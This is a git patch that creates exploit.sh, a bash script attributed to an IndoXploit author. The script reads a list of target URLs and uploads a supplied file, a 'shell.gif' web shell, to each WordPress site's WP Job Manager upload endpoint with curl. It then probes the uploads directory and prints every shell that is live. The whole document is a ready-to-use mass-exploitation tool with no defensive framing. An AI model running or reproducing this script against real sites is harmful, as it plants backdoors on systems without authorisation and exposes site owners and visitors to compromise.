From 56cde4a8c2d7631a735dcb79511cb0acd8ee2df9 Mon Sep 17 00:00:00 2001
From: Sumeragi Kururu <11514023+linuxsec@users.noreply.github.com>
Date: Sun, 23 Sep 2018 17:57:55 +0700
Subject: [PATCH] Create exploit.sh

---
 exploit.sh | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 exploit.sh

diff --git a/exploit.sh b/exploit.sh
new file mode 100644
index 0000000..8185782
--- /dev/null
+++ b/exploit.sh
@@ -0,0 +1,28 @@
+#!/bin/bash
+# Coded by L0c4lh34rtz - IndoXploit
+
+args=("$@")
+target=$(pwd)"/"${args[0]}
+file_=$(pwd)"/"${args[1]}
+tgl=$(date +"%Y")
+bln=$(date +"%m")
+
+if [ -z "$2" ]
+	then
+	echo "usage: wpjob.sh target.txt shell.gif"
+else
+	for url in $(cat $target)
+	do
+		echo "[+] Scanning $url"
+		vuln="$url/jm-ajax/upload_file/"
+		shell="$url/wp-content/uploads/job-manager-uploads/file/$tgl/$bln/"$(basename "$file_")
+
+		curl -s --connect-timeout 10 -k -H "User-Agent: indoxploit" -F "file=@$file_" "$vuln" -o /dev/null
+		check=$(curl -s -k -w "%{http_code}" -H "User-Agent: indoxploit" "$shell" -o /dev/null)
+
+		if (($check == 200))
+			then
+			echo -e "\e[92m$shell\e[0m"
+		fi
+	done
+fi